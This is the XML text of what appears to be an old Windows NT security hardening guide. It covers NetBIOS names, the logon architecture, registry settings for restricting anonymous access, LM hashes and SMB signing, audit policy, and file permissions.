        <w:t>DEC Pathworks TCPIP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87</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange M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6A</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange IM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BE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Network Monitor Ag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BF</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Network Monitor Ap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username&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>03</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Messenger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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>00</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Domain 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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1B</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Domain Master Brow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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Domain Controll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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1D</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Master Brow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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1E</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Browser Service Elec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INet~Services&gt;</w:t>
        <w:tab/>
        <w:t>1C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Internet Information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IS~Computer_name&gt;</w:t>
        <w:tab/>
        <w:t>00</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Internet Information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omputername&gt;</w:t>
        <w:tab/>
        <w:t>[2B]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Lotus Notes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RISMULTICAST</w:t>
        <w:tab/>
        <w:t>[2F]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Lotus No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RISNAMESERVER</w:t>
        <w:tab/>
        <w:t>[33]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Lotus No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te_$ND800ZA</w:t>
        <w:tab/>
        <w:t>[20]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>DCA Irmalan Gateway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ique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name uniq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roup (G): A normal group; the single name may exist with many IP address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ultihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 2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net Group (I): This is a special configuration of the group name used to manage WinNT domain na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ain Name (D): New in NT 4.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7] The IpConfig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ipconfig command will give you information about your current TCP/IP configuration. Information such as IP address, default gateway, subnet mask, etc can all be retrieved using this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ipconfig [/? | /all | /release [adapter] | /renew [adap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witches:    /?       Display this help mess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ll     Display full configuration inform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release Release the IP address for the specified adap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renew   Renew the IP address for the specified adap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0.8] The Telnet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chnically, telnet is a protocol. This means it is a language that computer use to communicate with one another in a particular way.  From your point of view, Telnet is a program that lets you login to a site on the Internet through your connection to Teleport. It is a terminal emulation program, meaning that when you connect to the remote site, your computer functions as a terminal for that compu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ce the connection is made, you can use your computer to access information, run programs, edit files, and otherwise use whatever resources are available on the other computer. What is available depends on the computer you connect to. Most of the times, if you type '?' or 'help', you would normally receive some type of information, menu options, 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Note: telnet connections give you command-line access only. In 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ords, instead of being able to use buttons and menus as you do with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graphical interface, you have to type commands. However, telnet a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you to use certain utilities and resources you cannot access with you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other Internet applic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telnet  hostname or IP address  port(option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0] NT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1] The Logon Pro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Log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s must log on to a Windows NT machine in order to use that NT based machine or network. The logon process itself cannot be bypassed, it is mandatory. Once the user has logged on, an access token is created (this token will be discussed in more detail later). This token contains user specific security information, such as: security identifier, group identifiers, user rights and permissions. The user, as well as all processes spawned by the user are identified to the system with this tok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irst step in the WinLogon process is something we are all familiar with, CTRL+ALT+DEL. This is NT's default Security Attention Sequence (SAS - The SAS key combo can be changed. We will also discuss that later.). This SAS is a signal to the operating system that someone is trying to logon.  After the SAS is triggered, all user mode applications pause until the security operation completes or is cancelled. (Note: The SAS is not just a logon operation, this same key combination can be used for logging on, logging off, changing a password or locking the workstation.) The pausing, or closing, of all user mode applications during SAS is a security feature that most people take for granted and dont understand. Due to this pausing of applications, logon related trojan viruses are stopped, keyloggers (programs that run in memory, keeping track of keystrokes, therefor recording someones password) are stopped as we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user name is not case sensitive but the password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fter typing in your information and clicking OK (or pressing enter), the WinLogon process supplies the information to the security subsystem, which in turn compares the information to the Security Accounts Manager (SAM). If the information is compliant with the information in the SAM, an access token is created for the user. The WinLogon takes the access token and passes it onto the Win32 subsytem, which in turn starts the operating systems shell. The shell, as well as all other spawned processes will receive a token. This token is not only used for security, but also allows NTs auditing and logging features to track user usage and access of network resour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All of the logon components are located in a file known as the Graphical Indetification and Authentication (GINA) module, specifically MSGINA.DLL. Under certain conditions, this file can be replaced, which is how you would change the SAS key combin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fine tuning of the WinLogon process, you can refer to the registry. All of the options for the WinLogon process are contained in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon area. You can also fine tune the process by using the Policy Edi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gging on to a Do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an NT machine is a participant on a Domain, you would not only need to login to the local machine, but the Domain as well. If a computer is a member of a Domain, the WinLogon process is replaced by the NetLogon pro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2] Security Architecture Compon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cal Security Authority (LSA): Also known as the security subsystem, it is the central portion of NT security. It handles local security policies and user authentication. The LSA also handles generating and logging audit messag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curity Accounts Manager (SAM): The SAM handles user and group accounts, and provides user authentication for the LS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ecurity Reference Monitor (SRM): The SRM is in charge of enforcing and assuring access validation and auditing for the LSA. It references user account information as the user attempts to access resourc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3] Introduction to Securing an NT Bo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stra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icrosoft Windows NT operating system provides several security features.  However, the default out-of-the-box configuration is highly relaxed, especially on the Workstation product.  This is because the operating system is sold as a shrink-wrapped product with an assumption that an average customer may not want to worry about a highly restrained but secure system on their deskto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particular installation's requirements can differ significantly from another.  Therefore, it is necessary for individual customers to evaluate their particular environment and requirements before implementing a security configuration.  This is also because implementing security settings can impact system configuration.  Certain applications installed on Windows NT may require more relaxed settings to function properly than others because of the nature of the product.  Customers are therefore advised to careful evaluate recommendations in the context of their system configurations and us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you install a Windows NT machine as a web server or a firewall, you should tighten up the security on that box. Ordinary machines on your internal network are less accessible than a machine the Internet.  A machine accessible from the Internet is more vulnerable and likely to be attacked.  Securing the machine gives you a bastion host. Some of the things you should do inclu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Remove all protocol stacks except TCP/IP, since IP is the only protocol that runs on the Intern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Remove unnecessary network binding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Disable all unnecessary accounts, like gue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Remove share permissions and default shar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Remove network access for everyone (User Manger -&gt; Policies -&gt;User rights, "Access this computer from the networ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Disable unnecessary servic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Enable audit logg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rack the audit inform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4] Physical Security Consider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ke the precautions you would with any piece of valuable equipment to protect against casual theft. This step can include locking the room the computer is in when no one is there to keep an eye on it, or using a locked cable to attach the unit to a wall. You might also want to establish procedures for moving or repairing the computer so that the computer or its components cannot be taken under false preten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a surge protector or power conditioner to protect the computer and its peripherals from power spikes. Also, perform regular disk scans and defragmentation to isolate bad sectors and to maintain the highest possible disk performan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with minimal security, the computer should be protected as any valuable equipment would be. Generally, this involves keeping the computer in a building that is locked to unauthorized users, as most homes and offices are. In some instances you might want to use a cable and lock to secure the computer to its location. If the computer has a physical lock, you can lock it and keep the key in a safe place for additional security. However, if the key is lost or inaccessible, an authorized user might be unable to work on the compu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might choose to keep unauthorized users away from the power or reset switches on the computer, particularly if your computer's rights policy denies them the right to shut down the computer. The most secure computers (other than those in locked and guarded rooms) expose only the computer's keyboard, monitor, mouse, and (when appropriate) printer to users. The CPU and removable media drives can be locked away where only specifically authorized personnel can access th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5] Backu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gular backups protect your data from hardware failures and honest mistakes, as well as from viruses and other malicious mischief. The Windows NT Backup utility is described in Chapter 6, "Backing Up and Restoring Network Files" in Microsoft Windows NT Server Concepts and Planning. For procedural information, see Hel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bviously, files must be read to be backed up, and they must be written to be restored. Backup privileges should be limited to administrators and backup operators-people to whom you are comfortable giving read and write access on all fi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6] Networks and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the network is entirely contained in a secure building, the risk of unauthorized taps is minimized or eliminated. If the cabling must pass through unsecured areas, use optical fiber links rather than twisted pair to foil attempts to tap the wire and collect transmitted da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7] Restricting the Boot Pro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st personal computers today can start a number of different operating systems. For example, even if you normally start Windows NT from the C: drive, someone could select another version of Windows on another drive, including a floppy drive or CD-ROM drive. If this happens, security precautions you have taken within your normal version of Windows NT might be circumven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general, you should install only those operating systems that you want to be used on the computer you are setting up. For a highly secure system, this will probably mean installing one version of Windows NT. However, you must still protect the CPU physically to ensure that no other operating system is loaded. Depending on your circumstances, you might choose to remove the floppy drive or drives. In some computers you can disable booting from the floppy drive by setting switches or jumpers inside the CPU. If you use hardware settings to disable booting from the floppy drive, you might want to lock the computer case (if possible) or lock the machine in a cabinet with a hole in the front to provide access to the floppy drive. If the CPU is in a locked area away from the keyboard and monitor, drives cannot be added or hardware settings changed for the purpose of starting from another operating system.   Another simple setting is to edit the boot.ini file such that the boot timeout is 0 seconds; this will make hard for the user to boot to another system if one exi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 many hardware platforms, the system can be protected using a power-on password. A power-on password prevents unauthorized personnel from starting an operating system other than Windows NT, which would compromise system security. Power-on passwords are a function of the computer hardware, not the operating system software. Therefore the procedure for setting up the power-on password depends on the type of computer and is available in the vendor's documentation supplied with the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8] Security Steps for an NT Operating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0.9] Install Latest Service Pack and applicable hot-fix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stall the latest recommended Microsoft Service Pack for the NT operating system.  The applicable hot-fixes should also be installed.  Generally not all hot-fixes are required.  Also the order in which hot-fixes are installed is very important, as later hot-fixes sometimes supersede earlier hot-fix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tp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt4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0] Display a Legal Notice Before Log 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dows NT can display a message box with the caption and text of your choice before a user logs on. Many organizations use this message box to display a warning message that notifies potential users that they can be held legally liable if they attempt to use the computer without having been properly authorized to do so. The absence of such a notice could be construed as an invitation, without restriction, to enter and browse the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log on notice can also be used in settings (such as an information kiosk) where users might require instruction on how to supply a user name and password for the appropriate accou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display a legal notice, use the Registry Editor to create or assign the following registry key values on the workstation to be protec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SOFTWAR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Microsoft\Windows NT\Current Version\Winlogon</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LegalNoticeCaption</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w:t>
        <w:tab/>
        <w:t>REG_SZ</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w:t>
        <w:tab/>
        <w:t>Whatever you want for the title of the message box</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SOFTWAR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Microsoft\Windows NT\Current Version\Winlogon</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LegalNoticeText</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w:t>
        <w:tab/>
        <w:t>REG_SZ</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w:t>
        <w:tab/>
        <w:t>Whatever you want for the text of the message box</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hanges take effect the next time the computer is started. You might want to update the Emergency Repair Disk to reflect these chang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lcome to the XYZ Information Kios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g on using account name Guest and password XYZCor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uthorized Users On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system is for the use of authorized users only. Individuals using this computing system without authority, or in excess of their authority, are subject to having all of their activities on this system monitored and recorded by system personnel.  In the course of monitoring individuals improperly using this system, or in the course of system maintenance, the activities of authorized users may be monitored.  Anyone using this system expressly consents to such monitoring and is advised that if such monitoring reveals possible evidence of criminal activity, system personnel may provide the evidence of such monitoring to law enforcement offici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1] Rename Administrative Accou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is a good idea to rename the built-in Administrator account to something less obvious. This powerful account is the one account that can never be locked out due to repeated failed log on attempts, and consequently is attractive to hackers who try to break in by repeatedly guessing passwords. By renaming the account, you force hackers to guess the account name as well as the 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ke the following chang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Remove right "LOG ON FROM THE NETWORK" from Administrator's gro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dd right "LOG ON FROM THE NETWORK" for individuals who are administrato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Enable auditing of failed login attemp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Lock out users for more than 5 login failur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Require password of at least 8 charact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2] Disable Guest Accou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isable Guest account and remove all rights (note:  if using with Internet Information Server then ensure that web user account has permission to access appropriate directories and the right to "LOG ON LOCAL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imited access can be permitted for casual users through the built-in Guest account. If the computer is for public use, the Guest account can be used for public log-ons. Prohibit Guest from writing or deleting any files, directories, or registry keys (with the possible exception of a directory where information can be lef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a standard security configuration, a computer that allows Guest access can also be used by other users for files that they don't want accessible to the general public. These users can log on with their own user names and access files in directories on which they have set the appropriate permissions. They will want to be especially careful to log off or lock the workstation before they leave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3] Logging Off or Locking the Workst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s should either log off or lock the workstation if they will be away from the computer for any length of time. Logging off allows other users to log on (if they know the password to an account); locking the workstation does not. The workstation can be set to lock automatically if it is not used for a set period of time by using any 32-bit screen saver with the Password Protected option. For information about setting up screen savers, see Hel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Install password protected screen saver that automatically starts if workstation is not used for 5-15 minu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4] Allowing Only Logged-On Users to Shut Down the Compu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rmally, you can shut down a computer running Windows NT Workstation without logging on by choosing Shutdown in the Logon dialog box. This is appropriate where users can access the computer's operational switches; otherwise, they might tend to turn off the computer's power or reset it without properly shutting down Windows NT Workstation. However, you can remove this feature if the CPU is locked away. (This step is not required for Windows NT Server, because it is configured this way by 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require users to log on before shutting down the computer, use the Registry Editor to create or assign the following Registry key val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SOFTWAR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Microsoft\Windows NT\Current Version\Winlogon</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ShutdownWithoutLogon</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w:t>
        <w:tab/>
        <w:t>REG_SZ</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w:t>
        <w:tab/>
        <w:t>0</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hanges will take effect the next time the computer is started. You might want to update the Emergency Repair Disk to reflect these chang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5] Hiding the Last User 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y default, Windows NT places the user name of the last user to log on the computer in the User name text box of the Logon dialog box. This makes it more convenient for the most frequent user to log on. To help keep user names secret, you can prevent Windows NT from displaying the user name from the last log on. This is especially important if a computer that is generally accessible is being used for the (renamed) built-in Administrator accou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prevent display of a user name in the Logon dialog box, use the Registry Editor to create or assign the following registry key val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SOFTWAR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Microsoft\Windows NT\Current Version\Winlogon</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DontDisplayLastUserNam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w:t>
        <w:tab/>
        <w:t>REG_SZ</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w:t>
        <w:tab/>
        <w:t>1</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6] Restricting Anonymous network access to Regi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dows NT version 4.0 Service Pack 3 includes a security enhancement that restricts anonymous (null session) logons when they connect to specific named pipes including the one for Regi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is a registry key value that defines the list of named pipes that are "exempt" from this restriction.  The key value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SYSTEM</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System\CurrentControlSet\Services\LanManServer\Parameters</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NullSessionPipes</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w:t>
        <w:tab/>
        <w:t>REG_MULTI_SZ</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w:t>
        <w:tab/>
        <w:t>Add or Remove names from the list as required by the configuration.</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lease refer to Knowledge Base article Q143138 for more detai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7] Restricting Anonymous network access to lookup account names and network shar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dows NT has a feature where anonymous logon users can list domain user names and enumerate share names. Customers who want enhanced security have requested the ability to optionally restrict this functionality. Windows NT 4.0 Service Pack 3 and a hotfix for Windows NT 3.51 provide a mechanism for administrators to restrict the ability for anonymous logon users (also known as NULL session connections) to list account names and enumerate share names. Listing account names from Domain Controllers is required by the Windows NT ACL editor, for example, to obtain the list of users and groups to select who a user wants to grant access rights. Listing account names is also used by Windows NT Explorer to select from list of users and groups to grant access to a sh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egistry key value to set for enabling this feature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SYSTEM</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System\CurrentControlSet\Control\LSA</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RestrictAnonymous</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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1.</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enhancement is part of Windows NT version 4.0 Service Pack 3.  A hot fix for it is also provided for Windows NT version 3.51.  Please refer to Knowledge Base article Q143474 for more details on th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8] Enforcing strong user passwo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dows NT 4.0 Service Pack 2 and later includes a password filter DLL file (Passfilt.dll) that lets you enforce stronger password requirements for users. Passfilt.dll provides enhanced security against "password guessing" or "dictionary attacks" by outside intrud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assfilt.dll implements the following password polic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Passwords must be at least six (6) characters long. (The minimum password length can be increased further by setting a higher value in the Password Policy for the do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Passwords must contain characters from at least three (3) of the following four (4) class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scription</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Examp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glish upper case letters</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>A, B, C, ... Z</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glish lower case letters</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>a, b, c, ... z</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sternized Arabic numerals</w:t>
        <w:tab/>
        <w:t>0, 1, 2, ... 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n-alphanumeric ("special characters") such as punctuation symbo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Passwords may not contain your user name or any part of your full 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se requirements are hard-coded in the Passfilt.dll file and cannot be changed through the user interface or registry. If you wish to raise or lower these requirements, you may write your own .dll and implement it in the same fashion as the Microsoft version that is available with Windows NT 4.0 Service Pack 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use Passfilt.Dll, the administrator must configure the password filter DLL in the system registry on all domain controllers.  This can be done as follows with the following registry key val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SYSTEM</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System\CurrentControlSet\Control\LSA</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Notification Packages</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w:t>
        <w:tab/>
        <w:t>REG_MULTI_SZ</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w:t>
        <w:tab/>
        <w:t>Add string "PASSFILT"  (do not remove existing ones).</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1.9] Disabling LanManager Password Hash Suppo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dows NT supports the following two types of challenge/response authentic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LanManager (LM) challenge/respons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Windows NT challenge/respon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allow access to servers that only support LM authentication, Windows NT clients currently send both authentication types. Microsoft developed a patch that allows clients to be configured to send only Windows NT authentication.  This removes the use of LM challenge/response messages from the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pplying this hot fix, configures the following registry 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SYSTEM</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System\CurrentControlSet\Control\LSA</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LMCompatibilityLevel</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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>0,1,2  (Default 0)</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tting the value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0 - Send both Windows NT and LM password for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1 - Send Windows NT and LM password forms only if the server requests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2 - Never send LM password for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a Windows NT client selects level 2, it cannot connect to servers that support only LM authentication, such as Windows 95 and Windows for Workgrou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more complete information on this hot fix, please refer to Knowledge Base article number Q14770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0] Wiping the System Page File during clean system shutdow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irtual Memory support of Windows NT uses a system page file to swap pages from memory of different processes onto disk when they are not being actively used.  On a running system, this page file is opened exclusively by the operating system and hence is well-protected.  However, systems that are configured to allow booting to other operating systems, may want to ensure that system page file is wiped clean when Windows NT shuts down.  This ensures that sensitive information from process memory that may have made into the page file is not available to a snooping user.  This can be achieved by setting up the following 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SYSTEM</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System\CurrentControlSet\Control\SessionManager\Memory Management</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ClearPageFileAtShutdown</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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1</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at, this protection works only during a clean shutdown, therefore it is important that untrusted users do not have ability to power off or reset the system manual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1] Protecting the Regi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l the initialization and configuration information used by Windows NT is stored in the registry. Normally, the keys in the registry are changed indirectly, through the administrative tools such as the Control Panel. This method is recommended. The registry can also be altered directly, with the Registry Editor; some keys can be altered in no other w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egistry Editor supports remote access to the Windows NT registry. To restrict network access to the registry, use the Registry Editor to create the following registry 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CurrentcontrolSet\Control\SecurePipeServers</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winreg</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ecurity permissions set on this key define which users or groups can connect to the system for remote registry access. The default Windows NT Workstation installation does not define this key and does not restrict remote access to the registry. Windows NT Server permits only administrators remote access to the regi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2] Secure EventLog View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 configuration allows guests and null log ons ability to view event logs (system, and application logs).  Security log is protected from guest access by default, it is viewable by users who have "Manage Audit Logs" user right.  The Event log services use the following key to restrict guest access to these log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System\CurrentControlSet\Services\EventLog\[LogNam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RestrictGuestAccess</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ype </w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1</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t the value for each of the logs to 1.  The change takes effect on next reboot.  Needless to say that you will have to change the security on this key to disallow everyone other than Administrators and System any access because otherwise malicious users can reset these valu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3] Secure Print Driver Install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gistry key AddPrinterDrivers under HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Control\Print\Providers\LanMan Print Services\Servers, Key value AddPrinterDrivers (REG_DWORD) is used to control who can add printer drivers using the print folder.  This key value should be set to 1 to enable the system spooler to restrict this operation to administrators and print operators (on server) or power users (on workst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System\CurrentcontrolSet\Control\Print\Providers\LanMan Print Services\Servers</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AddPrintDrivers</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ype </w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1</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4] The Schedule Service (AT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Schedule service (also known as the AT command) is used to schedule tasks to run automatically at a preset time. Because the scheduled task is run in the context run by the Schedule service (typically the operating system's context), this service should not be used in a highly secure environme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y default, only administrators can submit AT commands. To allow system operators to also submit AT commands, use the Registry Editor to create or assign the following registry key val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SYSTEM</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CurrentControlSet\Control\Lsa</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Submit Control</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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1</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is no way to allow anyone else to submit AT commands.  Protecting the registry as explained earlier restricts direct modification of the registry key using the registry editor.  Access to the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\Schedule should also be restricted to only those users/groups (preferrably Administrators only) that are allowed to submit jobs to the schedule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hanges will take effect the next time the computer is started. You might want to update the Emergency Repair Disk to reflect these chang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5] Secure File Shar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native Windows NT file sharing service is provided using the SMB-based server and redirector services.  Even though only administrators can create shares, the default security placed on the share allows Everyone full control access.  These permissions are controlling access to files on down level file systems like FAT which do not have security mechanisms built in.  Shares on NTFS enforce the security on the underlying directory it maps to and it is recommended that proper security be put via NTFS and not via the file sharing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so note that the share information resides in the registry which also needs to be protected as explained in a section earli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ervice Pack 3 for Windows NT version 4.0 includes several enhancements to SMB based file sharing protocol.  These are:It supports mutual authentication to counter man-in-the-middle attac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It supports message authentication to prevent active message attac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se are provided by incorporating message signing into SMB packets which are verified by both server and client ends.  There are registry key settings to enable SMB signatures on each side.  To ensure that SMB server responds to clients with message signing only, configure the following key val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SYSTEM</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System\CurrentControlSet\Services\LanManServer\Parameters</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RequireSecuritySignatur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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1</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tting this value ensures that the Server communicates with only those clients that are aware of message signing.  Note that this means that installations that have multiple versions of client software, older versions will fail to connect to servers that have this key value configu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milarly, security conscious clients can also decide to communicate with servers that support message signing and no one el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SYSTEM</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System\CurrentControlSet\Services\Rdr\Parameters</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RequireSecuritySignatur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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1</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at setting this key value implies that the client will not be able to connect to servers which do not have message signing suppo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lease refer to Knowledge Base article Q161372 for further details on SMB message signing enhancem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dows NT version 4.0 Service Pack 3 also includes another enhancement to SMB file sharing protocol such that by default you are unable to connect to SMB servers (such as Samba or Hewlett-Packard (HP) LM/X or LAN Manager for UNIX) with an unencrypted (plain text) password.  This protects from sending clear text forms of passwords over the wire.  Please refer to Knowledge base article Q166730 if you have any reasons to allow clients to send unencrypted passwords over the wi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itionally, customers may want to delete the administrative shares ($ shares) if they are not needed on an installation.  This can be accomplished using "net share" command.  For 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gt; net share admin$ /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6] Audi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uditing can inform you of actions that could pose a security risk and also identify the user accounts from which audited actions were taken. Note that auditing only tells you what user accounts were used for the audited events. If passwords are adequately protected, this in turn indicates which user attempted the audited events. However, if a password has been stolen or if actions were taken while a user was logged on but away from the computer, the action could have been initiated by someone other than the person to whom the user account is assig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en you establish an audit policy you'll need to weigh the cost (in disk space and CPU cycles) of the various auditing options against the advantages of these options. You'll want to at least audit failed log on attempts, attempts to access sensitive data, and changes to security settings. Here are some common security threats and the type of auditing that can help track th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7] Threat</w:t>
        <w:tab/>
        <w:t>Action</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acker-type break-in using random passwords</w:t>
        <w:tab/>
        <w:t>Enable failure auditing for log on and log off events.</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reak-in using stolen password</w:t>
        <w:tab/>
        <w:t>Enable success auditing for log on and log off events. The log entries will not distinguish between the real users and the phony ones. What you are looking for here is unusual activity on user accounts, such as log ons at odd hours or on days when you would not expect any activity.</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isuse of administrative privileges by authorized users</w:t>
        <w:tab/>
        <w:t>Enable success auditing for use of user rights; for user and group management, for security policy changes; and for restart, shutdown, and system events. (Note: Because of the high volume of events that would be recorded, Windows NT does not normally audit the use of the Backup Files And Directories and the Restore Files And Directories rights. Appendix B, "Security In a Software Development Environment," explains how to enable auditing of the use of these rights.)</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irus outbreak</w:t>
        <w:tab/>
        <w:t>Enable success and failure write access auditing for program files such as files with .exe and .dll extensions. Enable success and failure process tracking auditing. Run suspect programs and examine the security log for unexpected attempts to modify program files or creation of unexpected processes. Note that these auditing settings generate a large number of event records during routine system use. You should use them only when you are actively monitoring the system log.</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mproper access to sensitive files</w:t>
        <w:tab/>
        <w:t>Enable success and failure auditing for file- and object-access events, and then use File Manager to enable success and failure auditing of read and write access by suspect users or groups for sensitive files.</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mproper access to printers</w:t>
        <w:tab/>
        <w:t>Enable success and failure auditing for file- and object-access events, and then use Print Manager to enable success and failure auditing of print access by suspect users or groups for the printers.</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8] Enabling System Audi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ing system auditing can inform you of actions that pose security risks and possibly detect security breach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activate security event logging, follow these step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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Log on as the administrator of the local workst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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Click the Start button, point to Programs, point to Administrative Tools, and then click User Manag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w:t>
        <w:tab/>
        <w:t xml:space="preserve">On the Policies menu, click Aud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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Click the Audit These Events op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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Enable the options you want to use. The following options are availab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ab/>
        <w:t>Log on/Log off: Logs both local and remote resource logi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ab/>
        <w:t>File and Object Access: File, directory, and printer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ab/>
        <w:t>Note: Files and folders must reside on an NTFS partition for security logging to be enabled. Once the auditing of file and object access has been enabled, use Windows NT Explorer to select auditing for individual files and fold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ab/>
        <w:t>User and Group Management: Any user accounts or groups created, changed, or deleted. Any user accounts that are renamed, disabled, or enabled. Any passwords set or chang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ab/>
        <w:t>Security Policy Changes: Any changes to user rights or audit polic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ab/>
        <w:t>Restart, Shutdown, And System: Logs shutdowns and restarts for the local workst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ab/>
        <w:t>Process Tracking: Tracks program activation, handle duplication, indirect object access, and process ex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w:t>
        <w:tab/>
        <w:t>Click the Success check box to enable logging for successful operations, and the Failure check box to enable logging for unsuccessful oper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Click O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at Auditing is a "detection" capability rather than "prevention" capability.  It will help you discover security breaches after they occur and therefore should always be consider in addition to various preventive measur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2.9] Auditing Base Objec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auditing on base system objects, add the following key value to the registry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SYSTEM</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System\CurrentControlSet\Control\Lsa</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AuditBaseObjects</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w:t>
        <w:tab/>
        <w:t>REG_DWORD</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w:t>
        <w:tab/>
        <w:t>1</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at simply setting this key does not start generating audits.  The administrator will need to turn auditing on for the "Object Access" category using User Manager.  This registry key setting tells Local Security Authority that base objects should be created with a default system audit control li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0] Auditing of Privileg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ertain privileges in the system are not audited by default even when auditing on privilege use is turned on.  This is done to control the growth of audit logs.  The privileges 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w:t>
        <w:tab/>
        <w:t>Bypass traverse checking (given to every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w:t>
        <w:tab/>
        <w:t>Debug programs (given only to administrato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w:t>
        <w:tab/>
        <w:t>Create a token object (given to no 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w:t>
        <w:tab/>
        <w:t>Replace process level token (given to no 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w:t>
        <w:tab/>
        <w:t>Generate Security Audits (given to no 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w:t>
        <w:tab/>
        <w:t>Backup files and directories (given to administrators and backup operato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w:t>
        <w:tab/>
        <w:t>Restore files and directories (given to administrators and backup operato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 is granted to everyone so is meaningless from auditing perspective.  2 is not used in a working system and can be removed from administrators group.  3, 4 and 5 are not granted to any user or group and are highly sensitive privileges and should not be granted to anyone.  However 6 and 7 are used during normal system operations and are expected to be used.  To enable auditing of these privileges, add the following key value to the registry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SYSTEM</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System\CurrentControlSet\Control\Lsa</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FullPrivilegeAuditing</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w:t>
        <w:tab/>
        <w:t>REG_BINARY</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w:t>
        <w:tab/>
        <w:t>1</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at these privileges are not audited by default because backup and restore is a frequent operation and this privilege is checked for every file and directory backed or restored, which can lead to thousands of audits filling up the audit log in no time.  Carefully consider turning on auditing on these privilege u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1] Protecting Files and Directo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NTFS file system provides more security features than the FAT system and should be used whenever security is a concern. The only reason to use FAT is for the boot partition of an ARC-compliant RISC system. A system partition using FAT can be secured in its entirety using the Secure System Partition command on the Partition menu of the Disk Administrator ut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mong the files and directories to be protected are those that make up the operating system software itself. The standard set of permissions on system files and directories provide a reasonable degree of security without interfering with the computer's usability. For high-level security installations, however, you might want to additionally set directory permissions to all subdirectories and existing files, as shown in the following list, immediately after WindowsNT is installed. Be sure to apply permissions to parent directories before applying permissions to subdirecto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rst apply the following using the ACL edi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irectory</w:t>
        <w:tab/>
        <w:t>Permissions</w:t>
        <w:tab/>
        <w:t>Complet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NT and all subdirectories under it.</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Administrators: 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REATOR OWNER: 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veryone: Re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 Full Control</w:t>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 within the \WINNT tree, apply the following exceptions to the general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irectory</w:t>
        <w:tab/>
        <w:t>Permissions</w:t>
        <w:tab/>
        <w:t>Complet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NT\REPAIR</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Administrators: Full Control</w:t>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NT\SYSTEM32\CONFIG</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Administrators: 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REATOR OWNER: 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veryone: Li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 Full Control</w:t>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NT\SYSTEM32\SPOOL</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Administrators: 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REATOR OWNER: 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veryone: Re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ower Users: Chan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 Full Control</w:t>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NT\COOK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NT\FOR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NT\HIS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NT\OCCAC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NT\PROFI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NT\SEND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NT\Temporary Internet Files</w:t>
        <w:tab/>
        <w:t>Administrators: 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REATOR OWNER: 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veryone: Special Directory Access - Read, Write and Execute, Special File Access - No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 : Full Control</w:t>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veral critical operating system files exist in the root directory of the system partition on Intel 80486 and Pentium-based systems. In high-security installations you might want to assign the following permissions to these fi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le</w:t>
        <w:tab/>
        <w:t>C2-Level Permissions</w:t>
        <w:tab/>
        <w:t>Complet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oot.ini, \Ntdetect.com, \Ntldr</w:t>
